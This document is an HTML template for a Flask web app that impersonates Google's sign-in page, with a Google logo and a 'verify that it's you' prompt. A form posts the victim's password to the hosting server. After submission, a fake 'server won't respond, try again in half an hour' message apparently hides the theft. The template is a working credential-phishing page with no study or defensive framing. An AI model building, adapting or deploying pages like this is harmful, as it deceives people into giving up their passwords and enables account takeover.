<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign in-Google accounts</title>
  
  <link rel="shortcut icon" type="image/png" href="{{ url_for('static', filename='iconfav.png') }}"/>
  <link rel="stylesheet" href="{{ url_for('static', filename='index.css') }}">
</head>
<body>
  {% if data.message %}
  <h3><b><i>
  Seems like our server won't respond! Try again in half an hour.  
  </b></i></h3>
  {% endif %}
      <div class="maindiv">
        <img style="width: 70px;" src="{{ url_for('static', filename='google.png') }}" alt="Google">
        <p style="font-size: 23px; ">Sign in</p>
        <h3 style="margin-top: 10px; float: left;">To continue,first verify that it's you </h3>
        <form method="post">
        <div class="inputs" style="margin-top: 80px;">
          <div class="Fields">
            <div class="Fieldset">
              <input type="text" name="password" class="Before-FS" required="" autocomplete="off" id="myInput">
              <h1 class="Fs-H"><span>Enter your password</span></h1>
              <label class="placeholder">Enter your password</label>
            </div>
          </div>
        <br>
    
        </div>
        <br>
        <div style="margin-top: 80px; font-family: roboto,'Noto Sans Myanmar UI',arial,sans-serif;">
          <button type="submit" style="font-weight: bold; float: right;">Next</button>
          <button  style="background-color:transparent; color:blue; float: left;">Forgot password?</button>
        </div>
      </form>
        <div style=" font-family: roboto,'Noto Sans Myanmar UI',arial,sans-serif; margin-left: -215px; margin-top: -97px;">
       
            <input type="checkbox" name="pass" onclick="myFunction()">
            <label style="font-size: 15px;" for="pass">Show password</label><br>
    </div>
        </div   >
        <script>
            function myFunction() {
              var x = document.getElementById("myInput");
              if (x.type === "password") {
                x.type = "text";
              } else {
                x.type = "password";
              }
            }
            </script>
            

</body>
</html>